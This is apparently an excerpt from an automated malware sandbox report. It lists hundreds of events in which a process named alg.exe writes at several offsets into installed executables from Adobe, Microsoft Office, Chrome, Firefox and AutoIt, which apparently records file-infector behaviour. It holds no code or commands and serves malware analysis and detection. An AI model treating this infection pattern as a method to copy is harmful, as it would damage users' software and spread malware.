Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 1576448	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149888	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 574636	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4318208	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891724	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 1700540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4318208	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891724	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 1700540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1404928	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 633260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1199616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773132	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 513116	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
